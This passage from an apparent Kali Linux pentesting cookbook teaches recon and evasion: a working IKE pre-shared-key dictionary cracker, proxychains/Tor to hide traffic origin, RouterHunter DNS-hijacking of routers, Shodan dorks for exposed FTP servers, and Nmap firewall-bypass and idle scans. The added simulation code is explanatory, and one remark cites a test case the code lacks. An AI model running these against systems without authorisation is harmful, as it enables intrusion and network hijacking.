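    data = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, data, prf).digest()


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    """Parse one line in the format ike-scan --pskcrack writes."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected 9 colon-separated hex fields")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def crack_psk(capture: Dict[str, bytes], candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose HASH_R matches the capture."""
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand.encode(), capture), capture["hash_r"]):
            return cand
    return None


def make_capture(psk: str) -> str:
    """Constructed aggressive-mode capture for a known PSK (placeholder values, not real traffic)."""
    p = {
        "g_xr": bytes([0xA5]) * 128,   # responder DH public value, 1024-bit group
        "g_xi": bytes([0x5A]) * 128,   # initiator DH public value
        "cky_r": bytes.fromhex("1f2e3d4c5b6a7988"),
        "cky_i": bytes.fromhex("0102030405060708"),
        "sai_b": bytes.fromhex(
            "00000001" "00000001"                         # DOI IPSEC, situation SIT_IDENTITY_ONLY
            "0000002c" "01010001"                         # proposal 1, PROTO_ISAKMP, one transform
            "00000024" "01010000"                         # transform 1, KEY_IKE
            "80010005" "80020002" "80030001"              # 3DES, SHA1, PSK
            "80040002" "800b0001" "000c0004" "00007080"   # group 2, life in seconds, 28800
        ),
        "idir_b": bytes.fromhex("01000000c0a80101"),  # ID type IPV4_ADDR, 192.168.1.1
        "ni_b": bytes(range(16)),
        "nr_b": bytes(range(16, 32)),
        "hash_r": b"\x00" * 20,        # SHA1 length; real value filled in below
    }
    p["hash_r"] = hash_r(psk.encode(), p)
    return ":".join(p[name].hex() for name in FIELDS)


if __name__ == "__main__":
    line = make_capture("123456")
    print(crack_psk(parse_pskcrack_line(line), ["password", "letmein", "123456", "cisco"]))
    # Real use: read the line from the file written by ike-scan -Pkey.txt and
    # feed a wordlist from disk; -b style brute force is the same loop over
    # generated strings.
```

Two HMAC computations per candidate is all the cost there is, which is why a weak PSK on an aggressive-mode endpoint falls in seconds even without GPU acceleration. 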


Setting up proxychains 


Sometimes we need to hide the origin of our traffic while performing a pentest. Proxychains lets us route 
connections through one or more intermediary systems, so it is the proxy's IP rather than ours that ends up 
in the target's logs. Note what that does and does not buy you: the proxy operator still sees your real 
address, so this is not anonymity by itself, and any DNS lookups your tools make still go out directly 
unless proxy_dns is enabled in the configuration. 


Proxychains is a tool that forces any application to make its TCP connections through a proxy such as 
SOCKS4, SOCKS5, HTTP, or Tor. It works by hooking the libc connect() call, so tools that use raw sockets 
(for example nmap SYN scans or ICMP pings) bypass it entirely. 


How to do it... 


Proxychains is already installed in Kali. However, we need to add the proxies we want to use to its 
configuration file: 


1. To do that we open the config file of proxychains in a text editor with this command: 


leafpad /etc/proxychains.conf 


The following screenshot shows the output for the preceding command: 


[Screenshot: /etc/proxychains.conf open in Leafpad. The relevant part of the file reads:]

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#       Examples:
#
#            socks5  192.168.67.78   1080    lamer   secret
#            http    192.168.89.3    8080    justu   hidden
#            socks4  192.168.1.49    1080
#            http    192.168.39.93   8080
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050


We can add all the proxies we want under the [ProxyList] section at the end of the file and then save it.


Proxychains also allows us to use a dynamic chain or a random chain while connecting to the proxy servers.

2. In the config file, uncomment dynamic_chain or random_chain:


[Screenshot: the chain-mode section of /etc/proxychains.conf in Leafpad:]

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
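The two rules spelled out in the config comments above (exactly one chain mode should be uncommented, and if several are, the last one wins; ProxyList entries are type host port [user pass], separated by tabs or blanks) are easy to get wrong by hand. The following Python parser, added here as an example and not part of the book or of the proxychains project, applies both rules to a constructed proxychains.conf and reports which chain mode and which proxies proxychains would actually use. The function and variable names are this example's own.

```python
"""Validate a proxychains.conf against the rules its own comments state.

Added example; not the book's or the proxychains project's code.
"""
CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain")
PROXY_TYPES = ("http", "socks4", "socks5")

# Constructed sample: two chain modes left uncommented by mistake, one
# authenticated SOCKS5 entry, the default Tor entry and one bad line.
SAMPLE_CONF = """\
# The option below identifies how the ProxyList is treated.
dynamic_chain
#strict_chain
random_chain
proxy_dns
tcp_read_time_out 15000
[ProxyList]
# add proxy here ...
socks5\t192.168.67.78\t1080\tlamer\tsecret
http 192.168.89.3 8080
socks4 \t127.0.0.1 9050
ftp 10.0.0.1 21
"""


def parse_proxychains_conf(text):
    """Return {'chain_mode': ..., 'proxies': [...], 'errors': [...]}.

    chain_mode follows the file's rule: the last uncommented mode wins, and
    every earlier one is reported as an error so the operator can fix it.
    """
    chain_mode = None
    proxies, errors = [], []
    in_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        # Strip trailing comments and blanks (a '#' inside a password would
        # also be stripped here; proxychains has no escaping for that).
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if not in_list:
            if line in CHAIN_MODES:
                if chain_mode is not None:
                    errors.append(f"line {lineno}: {line} overrides {chain_mode}")
                chain_mode = line
            continue  # other global options are not validated here
        fields = line.split()  # 'tab' or 'blank' separated, per the comments
        if fields[0] not in PROXY_TYPES or len(fields) not in (3, 5):
            errors.append(f"line {lineno}: malformed proxy entry {line!r}")
            continue
        ptype, host, port = fields[:3]
        if not port.isdigit() or not 1 <= int(port) <= 65535:
            errors.append(f"line {lineno}: bad port {port!r}")
            continue
        entry = {"type": ptype, "host": host, "port": int(port)}
        if len(fields) == 5:
            entry["user"], entry["password"] = fields[3], fields[4]
        proxies.append(entry)
    return {"chain_mode": chain_mode, "proxies": proxies, "errors": errors}


if __name__ == "__main__":
    result = parse_proxychains_conf(SAMPLE_CONF)
    print("chain mode in effect:", result["chain_mode"])
    for p in result["proxies"]:
        print("proxy:", p)
    for e in result["errors"]:
        print("warning:", e)
```

Run against a real /etc/proxychains.conf by reading the file into parse_proxychains_conf; a non-empty errors list means the file does not say what its author thinks it says.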





























Using proxychains with tor 


To use proxychains with Tor, follow the given steps:


1. To use proxychains with Tor, we first need to install Tor using the following command:

apt-get install tor

2. Once it is installed, we run Tor by typing tor in the Terminal.
3. We then open another Terminal and type the following command to run an application via proxychains:

proxychains toolname -arguments


The following screenshot shows the example of the preceding commands: 


[Screenshot: two terminals side by side. Left: proxychains nmap 8.8.8.8; right: the tor process bootstrapping.]

root@kali:~# proxychains nmap 8.8.8.8
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-07 08:23 EST
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.046s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds

[notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 6/7198, and can only build 0% of likely paths.
[notice] Bootstrapped 50%: Loading relay descriptors
[notice] Bootstrapped 80%: Connecting to the Tor network
[notice] Bootstrapped 90%: Establishing a Tor circuit
[notice] Tor has successfully opened a circuit. Looks like client functionality is working.
[notice] Bootstrapped 100%: Done





Going on a hunt with Routerhunter 


Routerhunter is a tool used to find vulnerable routers on a network and run attacks against them that exploit the DNSChanger vulnerability. This vulnerability allows an attacker to change the router's DNS server and thereby redirect all of its traffic to websites of the attacker's choosing.


Getting ready 


For this recipe, you will again need to clone a git repository. 


We will use the following command: 


git clone https://github.com/jh00nbr/RouterHunterBR.git


How to do it... 


To execute RouterHunterBR.php, follow the given steps:


1. Once the file is cloned, enter the directory. 
2. Run the following command: 


php RouterHunterBR.php -h


The following screenshot shows the output of the preceding command: 


root@kali:~/RouterHunterBR# php RouterHunterBR.php -h
[Screenshot: the RouterHunterBR banner, "script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR ]", followed by the usage text]





3. We can provide Routerhunter with an IP range, DNS server IPs, and so on.


Gathering Intel and Planning Attack Strategies 


In this chapter, we will cover the following recipes: 


- Getting a list of subdomains
- Using Shodan for fun and profit
- Shodan Honeyscore
- Shodan plugins
- Using Nmap to find open ports
- Bypassing firewalls with Nmap
- Searching for open directories
- Performing deep magic with DMitry
- Hunting for SSL flaws
- Exploring connections with intrace
- Digging deep with theharvester
- Finding technology behind web apps
- Scanning IPs with masscan
- Sniffing around with Kismet
- Testing routers with firewalk


Introduction 


In the previous chapter we learned the basics of hunting for subdomains. In this chapter, we dive a little deeper and look at other tools available for gathering intel on our target. We start with the infamous tools of Kali Linux.

Gathering information is a crucial stage of a penetration test, as every step we take afterwards will be driven by the information we gather here. So it is very important that we gather as much information as possible before jumping into the exploitation stage.


Getting a list of subdomains 


We do not always have a situation where the client has defined a full, detailed scope of what needs to be pentested. So we will use the following recipes to gather as much information as we can before performing the pentest.


Fierce 


We start by jumping into Kali's Terminal and using the first and most widely used tool, fierce.


How to do it... 


The following steps demonstrate the use of fierce: 


1. To launch fierce, we type fierce -h to see the help menu: 


[Screenshot: fierce -h in the Kali Terminal:]

root@kali:~# fierce -h
Fierce - Copyright (C) 2006,2007 - By RSnake at http://ha.ckers.org/fierce

Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Overview:
  Fierce is a semi-lightweight scanner that helps locate non-contiguous
  IP space and hostnames against specified domains. It's really meant
  as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
  of those require that you already know what IP space you are looking
  for. This does not perform exploitation and does not scan the whole
  internet indiscriminately. It is meant specifically to locate likely
  targets both inside and outside a corporate network. Because it uses
  DNS primarily you will often find mis-configured networks that leak
  internal address space. That's especially useful in targeted malware.

Options:
  -connect  Attempt to make http connections to any non RFC1918
            (public) addresses. This will output the return headers ...





2. To perform a subdomain scan we use the following command: 


fierce -dns host.com -threads 10

The following screenshot shows the output of the preceding command:


root@kali:~# fierce -dns google.com -threads 10
DNS Servers for google.com:
[Screenshot: the four google.com nameservers are listed here, ns3.google.com among them]

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    (the same result for each of the other nameservers)

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force





DNSdumpster 


This is a free project by Hacker Target to look up subdomains. It relies on https://scans.io/ for its results and can also be used to get the subdomains of a website. We should always prefer to use more than one tool for subdomain enumeration, as we may get something from one tool that another failed to pick up.


How to do it... 


It is pretty simple to use. We type the domain name we want the subdomains for and it shows us the results:

[Screenshot: the https://dnsdumpster.com search page]





Using Shodan for fun and profit 


Shodan is the world's first search engine to search for devices connected to the internet. It was launched 
in 2009 by John Matherly. Shodan can be used to look up webcams, databases, industrial systems, video 
games, and so on. Shodan mostly collects data on the most popular web services running, such as HTTP, 
HTTPS, MongoDB, FTP, and many more. 


Getting ready 


To use Shodan we will need to create an account on Shodan. 


How to do it... 


To learn about Shodan, follow the given steps:

1. Open your browser and visit https://www.shodan.io:

[Screenshot: the Shodan home page (https://www.shodan.io), "The search engine for Webcams", with the menu Explore, Downloads, Reports, Enterprise Access, Contact Us, My Account, and the panels "Explore the Internet of Things" and "See the Big Picture"]


2. We begin by performing a simple search for the FTP services running. To do this we can use the following Shodan dork: port:"21". The following screenshot shows the search results:

[Screenshot: Shodan results for port:"21". The first hit, 65.75.161.60 (SoftwareWorks Group, United States, Redwood City), shows the banner "220 (vsFTPd 2.0.5)", "230 Login successful" and the "214-The following commands are recognized" list (ABOR ACCT ALLO APPE CDUP CWD DELE ...); the sidebar breaks the results down by country (United States, China, Germany, Japan, Korea).]


3. This search can be made more specific by specifying a particular country or organization: port:"21" country:"IN". The following screenshot shows the search results:

[Screenshot: Shodan results for port:"21" country:"IN". Hits include 103.43.7.23 (Eixire Date Services Pvt. Ltd., India) with the banner "220 ravi sikrona FTP server (MikroTik 6.32.2) ready / 530 Login incorrect / 500 'HELP': command not understood / 500 'FEAT': command not understood", and 203.109.119.44 (YOU Broadband & Cable India Ltd.) with "220 Microsoft FTP Service / 530 User cannot log in, home directory inaccessible / 214-The following commands are recognized (* ==>'s unimplemented) / ABOR ..."; the sidebar lists the top cities (Bangalore, New Delhi, Mumbai, Delhi, Gurgaon).]


We can now see all the FTP servers running in India; we can also see the servers that allow anonymous login and the version of the FTP server they are running.

Next, we try the organization filter. It can be done by typing port:"21" country:"IN" org:"BSNL", as shown in the following screenshot:

[Screenshot: Shodan results for port:"21" country:"IN" org:"BSNL". Hits include 117.223.178.201 (India, Trivandrum) with the banner "220 Welcome to TBS FTP Server / 530 Login incorrect. / 202 Command not implemented, superfluous at this site.", 117.218.140.46 (BSNL, India, Bangalore) with "220 ucftpd FTP server ready. / 530 Login incorrect / 530 Please login with USER and PASS / 502 FEAT not implemented." and 117.195.226.51; the sidebar lists Bangalore, New Delhi, Chennai, Pune and Hyderabad.]


Shodan has other tags as well that can be used to perform advanced searches, such as:

- net: to scan IP ranges
- city: to filter by city

More details can be found at https://www.shodan.io/explore.
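The banners in the preceding screenshots carry the two facts the recipe points out, whether the server accepted an anonymous login and which software it runs, but reading them by eye does not scale to an organization's whole Shodan result set. The following Python triage script is an added example, not the book's code and not a Shodan API: it parses raw FTP reply lines of the kind Shodan records per host and classifies each host. The banners and IPs it uses are constructed after the screenshots (RFC 5737 documentation addresses, not the hosts shown), and the function names are this example's own.

```python
"""Triage FTP banners of the kind shown in the Shodan results above.

Added example; not the book's code and not a Shodan API. Shodan stores, per
host, the raw FTP reply lines it received; from those a defender can tell
which of the organization's exposed FTP servers accepted an anonymous login
(a 230 reply) and what software the 220 greeting reveals.
"""
import re

# Constructed banners modelled on the screenshots; the IPs are RFC 5737
# documentation addresses, not the hosts shown in the book.
SAMPLE_BANNERS = {
    "192.0.2.10": "220 (vsFTPd 2.0.5)\r\n230 Login successful.\r\n"
                  "214-The following commands are recognized.\r\n ABOR ACCT ALLO\r\n214 Help OK.\r\n",
    "192.0.2.11": "220 ravi sikrona FTP server (MikroTik 6.32.2) ready\r\n"
                  "530 Login incorrect\r\n500 'HELP': command not understood\r\n",
    "192.0.2.12": "220 Microsoft FTP Service\r\n"
                  "530 User cannot log in, home directory inaccessible\r\n",
    "192.0.2.13": "220 ucftpd FTP server ready.\r\n530 Login incorrect\r\n"
                  "530 Please login with USER and PASS\r\n502 FEAT not implemented.\r\n",
}

# (pattern applied to the 220 greeting, product name); group 1 = version if any
PRODUCT_PATTERNS = [
    (re.compile(r"vsFTPd (\d+(?:\.\d+)*)"), "vsFTPd"),
    (re.compile(r"MikroTik (\d+(?:\.\d+)*)"), "MikroTik"),
    (re.compile(r"Microsoft FTP Service"), "Microsoft FTP Service"),
    (re.compile(r"\bucftpd\b"), "ucftpd"),
]


def parse_replies(banner):
    """Return (code, text) for every reply line; continuation lines of a
    multi-line reply (no leading code) are skipped."""
    replies = []
    for line in banner.splitlines():
        m = re.match(r"^(\d{3})[ -](.*)$", line)
        if m:
            replies.append((int(m.group(1)), m.group(2)))
    return replies


def triage_banner(banner):
    replies = parse_replies(banner)
    greeting = next((text for code, text in replies if code == 220), "")
    product, version = "unknown", None
    for pattern, name in PRODUCT_PATTERNS:
        m = pattern.search(greeting)
        if m:
            product = name
            version = m.group(1) if m.groups() else None
            break
    codes = {code for code, _ in replies}
    if 230 in codes:
        anonymous = "accepted"     # 230 = user logged in after USER/PASS
    elif 530 in codes:
        anonymous = "rejected"     # 530 = not logged in
    else:
        anonymous = "unknown"      # no login attempt recorded in the banner
    return {"product": product, "version": version, "anonymous_login": anonymous}


def triage_all(banners):
    """Map ip -> triage result; hosts accepting anonymous login come first."""
    results = {ip: triage_banner(b) for ip, b in banners.items()}
    order = {"accepted": 0, "unknown": 1, "rejected": 2}
    return dict(sorted(results.items(), key=lambda kv: order[kv[1]["anonymous_login"]]))


if __name__ == "__main__":
    for ip, info in triage_all(SAMPLE_BANNERS).items():
        print(f"{ip:15} {info['anonymous_login']:9} {info['product']} {info['version'] or ''}")
```

The product patterns are deliberately few; extend PRODUCT_PATTERNS with the greetings your own servers emit, and treat "accepted" hosts as the ones to look at first.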


Shodan Honeyscore 


Shodan Honeyscore is another great project, built in Python. It helps us figure out whether an IP address we have is a honeypot or a real system.


How to do it... 


The following steps demonstrate the use of Shodan Honeyscore: 


1. To use Shodan Honeyscore, we visit https://honeyscore.shodan.io/:

[Screenshot: the Honeyscore page, "Honeypot Or Not? Enter an IP to check whether it is a honeypot or a real control system:"]





2. Enter the IP address we want to check, and that's it!

[Screenshot: the Honeyscore result for the entered IP address]





Shodan plugins 


To make our life even easier, Shodan has plugins for Chrome and Firefox that can be used to check open 
ports for websites we visit on the go! 


How to do it... 


We download and install the plugin from https://www.shodan.io/. Browse any website and we will see that by clicking on the plugin we can see the open ports:

[Screenshot: the Shodan plugin popup for 216.58.194.68, showing City Mountain View, Country United States, Organization Google, the list of open ports and a View Host Details link]


See also 


- The Dnscan recipe from Chapter 1, Kali — An Introduction
- The Digging deep with theharvester recipe


Using Nmap to find open ports 


Network Mapper (Nmap) is a security scanner written by Gordon Lyon. It is used to find hosts and 
services in a network. It first came out in September 1997. Nmap has various features as well as scripts 
to perform various tests such as finding the OS, service version, brute force default logins, and so on. 


Some of the most common types of scan are: 


- TCP connect() scan
- SYN stealth scan
- UDP scan
- Ping scan
- Idle scan


How to do it... 


The following is the recipe for using Nmap: 


1. Nmap is already installed in Kali Linux. We can type the following command to start it and see all 
the options available: 


nmap -h

The following screenshot shows the output of the preceding command:

root@kali:~# nmap
Nmap 7.01 ( https://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes





2. To perform a basic scan we use the following command:

nmap -sV -Pn x.x.x.x

The following screenshot shows the output of the preceding command:

root@kali:~# nmap -sV -Pn 192.168.1.1
Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-19 14:52 MSK
[Screenshot: service scan progress (Stats: ... elapsed; Service scan Timing: About 80.00% done), then the report for 192.168.1.1: Not shown: 995 closed ports; the PORT STATE SERVICE VERSION table lists open ftp, tcpwrapped, domain, http (Realtron WebServer 1.1) and 5431/tcp upnp (MiniUPnP).]





3. -Pn means we do not check whether the host is up by sending a ping request first. The -sV parameter lists the running services on the open ports that were found.

4. Another flag we can use is -A, which automatically performs OS detection, version detection, script scanning, and traceroute. The command is:

nmap -A -Pn x.x.x.x

5. To scan an IP range or multiple IPs, we can use this command:

nmap -A -Pn x.x.x.0/24


Using scripts 


The Nmap Scripting Engine (NSE) allows users to write their own scripts to perform different tasks automatically. These scripts are executed alongside the scan when it is run. They can be used to perform more effective version detection, exploitation of a vulnerability, and so on. The command for using a script is:

nmap -Pn -sV host.com --script dns-brute


root@kali:~# nmap -sV google.com --script dns-brute

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-19 14:56 MSK

The output of the preceding command is as follows:

Host script results:
| dns-brute:
|   DNS Brute-force hostnames:
[Screenshot: the list continues with id.google.com, images.google.com, admin.google.com, ads.google.com, alerts.google.com, news.google.com, upload.google.com and dns.google.com, each followed by its IPv4 or IPv6 address.]





Here the script dns-brute tries to find the available subdomains by brute forcing a set of common subdomain names against the domain.


See also 


- The Using Shodan for fun and profit recipe
- More information on the scripts can be found in the official NSE documentation at https://nmap.org/nsedoc/


Bypassing firewalls with Nmap 


Most of the time during a pentest, we will come across systems protected by firewalls or Intrusion Detection Systems (IDS). Nmap provides different ways to bypass these IDS/firewalls to perform port scans on a network. In this recipe, we will learn some of the ways we can bypass firewalls.


TCP ACK scan 


The ACK scan (-sA) sends acknowledgment packets instead of SYN packets, and the firewall does not create logs of ACK packets, as it treats them as responses to SYN packets. It is mostly used to map the type of firewall being used.


How to do it... 


The ACK scan was made to show unfiltered and filtered ports instead of open ones. 


The command for ACK scan is: 


nmap -sA x.x.x.x


Let's look at the comparison of how a normal scan differs from an ACK scan: 


root@kali:~# nmap -Pn 1...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-18 20:18 MSK
Nmap scan report for 180...
Host is up.
All 1000 scanned ports on 180... are filtered





Here we see the difference between a normal scan and an ACK scan: 


root@kali:~# nmap -sA 1...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-18 20:32
Nmap scan report for 1...
Host is up (0.00034s latency).
All 1000 scanned ports on 1... are unfiltered

Nmap done: 1 IP address (1 host up)
root@kali:~#





How it works... 


Whether ports show up as filtered or unfiltered depends on whether the firewall in use is stateful or stateless. A stateful firewall checks whether an incoming ACK packet is part of an existing connection and blocks it if it is not part of any requested connection. Hence, the port will show up as filtered during a scan.

A stateless firewall, on the other hand, will not block the ACK packets, and the ports will show up as unfiltered.
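To make the stateful/stateless distinction concrete, here is a small Python model of what happens to an unsolicited ACK probe. It is an added example, not code from the book or from Nmap, and it sends nothing on the network.It reproduces the rule Nmap's -sA applies (RST back means unfiltered, silence means filtered) against two toy firewalls: one that passes any segment with the ACK bit set, the classic stateless "established" ACL, and one that only passes segments belonging to a connection it saw open. The class and function names and the addresses are this example's own.

```python
"""Why an ACK scan sees 'filtered' behind a stateful firewall and
'unfiltered' behind a stateless one.

Added example; not the book's code and not Nmap's.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    flags: str   # TCP flags as letters: "S" SYN, "A" ACK, "SA", "R" RST


class StatelessFirewall:
    """Stateless ACL of the 'permit tcp any any established' kind: any
    segment with the ACK bit set is assumed to belong to an existing
    connection and is let through."""

    def allows(self, pkt):
        return "A" in pkt.flags


class StatefulFirewall:
    """Tracks connections it saw being opened and only passes ACKs that
    belong to one of them; an unsolicited ACK is dropped silently."""

    def __init__(self):
        self.connections = set()   # (client, server, server_port) seen with SYN

    def allows(self, pkt):
        if pkt.flags == "S":
            self.connections.add((pkt.src, pkt.dst, pkt.dport))
            return True
        return (pkt.src, pkt.dst, pkt.dport) in self.connections


def host_reply(pkt):
    """RFC 793: a segment with ACK set that matches no connection is
    answered with RST, whether the port is open or closed. That is why
    -sA can only say filtered/unfiltered, never open/closed."""
    if "A" in pkt.flags and "S" not in pkt.flags:
        return Packet(pkt.dst, pkt.src, pkt.dport, "R")
    return None


def ack_scan(firewall, ports, scanner="192.0.2.100", target="198.51.100.5"):
    """Return Nmap -sA's verdict per port: 'unfiltered' when a RST comes
    back, 'filtered' when the probe is dropped. (Return traffic through the
    firewall is not modelled; only the inbound probe is filtered.)"""
    verdicts = {}
    for port in ports:
        probe = Packet(scanner, target, port, "A")
        reply = host_reply(probe) if firewall.allows(probe) else None
        verdicts[port] = "unfiltered" if reply and reply.flags == "R" else "filtered"
    return verdicts


if __name__ == "__main__":
    print("stateless:", ack_scan(StatelessFirewall(), [22, 80, 443]))
    print("stateful: ", ack_scan(StatefulFirewall(), [22, 80, 443]))
```

The third case in the test, a stateful firewall that has seen the scanner open port 80 first, shows that "unfiltered" on a stateful device means exactly one thing: that device believes the ACK belongs to a connection it tracked.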


TCP Window scan 


Window scan (-sW) is almost the same as an ACK scan, except that it shows open and closed ports.


How to do it... 


Let's look at the difference between a normal scan and a TCP Window scan:


1. The command to run is: 


nmap -sW x.x.x.x


2. Let's look at the comparison of how a normal scan differs from a TCP Window scan: 


[Screenshot: the normal scan shows "Nmap scan report for 180...", "Host is up." and "All 1000 scanned ports on 180..."; the window scan below lists individual ports:]

root@kali:~# nmap -sW 1...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-18
Nmap scan report for 1...
Host is up (0.00035s latency).
PORT    STATE SERVICE
[Screenshot: the table lists low ports reported as open: tcpmux, compressnet, unknown, 6/tcp unknown, 7/tcp echo, daytime, qotd, ...]





Idle scan 


Idle scanning is an advanced technique where no packets sent to the target can be traced back to the 
attacker machine. It requires a zombie host to be specified. 


How to do it... 


The command to do an idle scan is: 


nmap -sI zombiehost.com domain.com


How it works... 


Idle scan works on the basis of a predictable IP ID (the IP fragmentation identification field) on the zombie host. First, the IP ID of the zombie host is checked, and then a connection request is spoofed from that host to the target host. If the port is open, an acknowledgment (SYN/ACK) is sent back to the zombie host, which resets (RST) the connection as it has no record of opening such a connection. Next, the attacker checks the IP ID on the zombie again: if it has changed by one step, it implies an RST was received from the target, meaning the port is closed; if it has changed by two steps, it means the zombie received a packet from the target and answered it with an RST, which implies that the port is open.
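The IP ID arithmetic in this explanation is easy to check with a small simulation. The following Python model is added here as an example; it is not the book's code or Nmap's, it sends no packets, and its names (Zombie, idle_scan_port, ...) are this example's own. It walks through one probe cycle for an open and for a closed port with a zombie whose IP ID increments by one per packet, which is the predictable behaviour the scan depends on, and then repeats it with a zombie that randomizes its IP IDs to show why such a host cannot serve as a zombie.

```python
"""Simulate the IP ID inference behind an idle scan.

Added example; not the book's code and not Nmap's. Nothing is sent on the
network: the zombie, the target and the probe exchange are in-memory models.
"""
import random


class Zombie:
    """A host whose IP ID field is a global per-packet counter (predictable)
    or a random value (the mitigation that defeats idle scanning)."""

    def __init__(self, randomize=False, seed=0):
        self.ipid = 1000
        self.randomize = randomize
        self.rng = random.Random(seed)

    def send(self):
        """Emit one packet and return the IP ID it carried."""
        # Random increments are kept in [3, 20000] so that the two or
        # three of them in one probe cycle never wrap past 65536 and
        # accidentally look like +1 or +2.
        step = self.rng.randint(3, 20000) if self.randomize else 1
        self.ipid = (self.ipid + step) % 65536
        return self.ipid

    def receive(self, flags):
        """Unsolicited SYN/ACK -> answer with RST (costs one IP ID).
        Unsolicited RST -> silently ignored (no packet sent)."""
        if flags == "SA":
            self.send()


def target_reply(port_open):
    """What the target sends the zombie in reply to the spoofed SYN."""
    return "SA" if port_open else "R"


def probe_zombie(zombie):
    """Attacker sends the zombie a SYN/ACK; the RST it answers with
    exposes its current IP ID."""
    return zombie.send()


def idle_scan_port(zombie, port_open):
    """One idle-scan cycle; returns Nmap's verdict for the port."""
    before = probe_zombie(zombie)
    zombie.receive(target_reply(port_open))   # consequence of the spoofed SYN
    after = probe_zombie(zombie)
    delta = (after - before) % 65536
    if delta == 1:
        return "closed|filtered"   # only our own probe moved the counter
    if delta == 2:
        return "open"              # zombie also sent a RST to the target
    return "indeterminate"         # zombie is not a usable idle host


def idle_scan(zombie, open_ports, ports):
    return {p: idle_scan_port(zombie, p in open_ports) for p in ports}


if __name__ == "__main__":
    print("predictable zombie:", idle_scan(Zombie(), {22, 443}, [22, 80, 443]))
    print("randomizing zombie:", idle_scan(Zombie(randomize=True), {22, 443}, [22, 80, 443]))
```

The randomizing case is the defensive takeaway: modern operating systems randomize or zero the IP ID field precisely so that a host's outgoing traffic cannot be counted from outside.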


Searching for open directories 


In the previous recipe, we discussed how to find open ports on a network IP or domain name. We often 
see developers running web servers on different ports. Sometimes developers may also leave directories 
misconfigured that may contain juicy information for us. We have already covered dirsearch in the 
previous chapter; here we will look at alternatives. 


The dirb tool 


The dirb tool is a well-known tool that can be used to brute force open directories. Although it is 
generally slow and does not support multi-threading, it is still a great way to find 
directories/subdirectories that may have been left open due to a misconfiguration. 


How to do it... 


Type the following command to fire up the tool: 


dirb https://domain.com


The following screenshot shows the output of the preceding command: 


root@kali:~# dirb https://google.com

-----------------
By The Dark Raver
-----------------

START_TIME: Sun Dec 18 22:15:29 2016
URL_BASE: https://google.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

---- Scanning URL: https://google.com/ ----
+ https://google.com/2001 (CODE:301|SIZE:224)





There's more... 


There are other options in dirb, as well, that come in handy:

-a: to specify a user agent
-c: to specify a cookie
-H: to enter a custom header
-x: to specify the file extension


See also 


- The Dirsearch recipe from Chapter 1, Kali — An Introduction


Performing deep magic with DMitry 


The Deepmagic Information Gathering Tool (DMitry) is an open source command-line application coded in C. It can gather subdomains, email addresses, whois info, and so on, about a target.


How to do it... 


To learn about DMitry, follow the given steps: 


1. We use a simple command: 


dmitry -h

The following screenshot shows the output of the preceding command:

root@kali:~# dmitry -h
Deepmagic Information Gathering Tool
"There be some deep magic going on"

dmitry: invalid option -- 'h'
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
  -o    Save output to %host.txt or to file specified by -o file
  -i    Perform a whois lookup on the IP address of a host
  -w    Perform a whois lookup on the domain name of a host
  -n    Retrieve Netcraft.com information on a host
  -s    Perform a search for possible subdomains
  -e    Perform a search for possible email addresses
  -p    Perform a TCP port scan on a host
  -f    Perform a TCP port scan on a host showing output reporting filtered ports
  -b    Read in the banner received from the scanned port
  -t 0-9  Set the TTL in seconds when scanning a TCP port ( Default 2 )





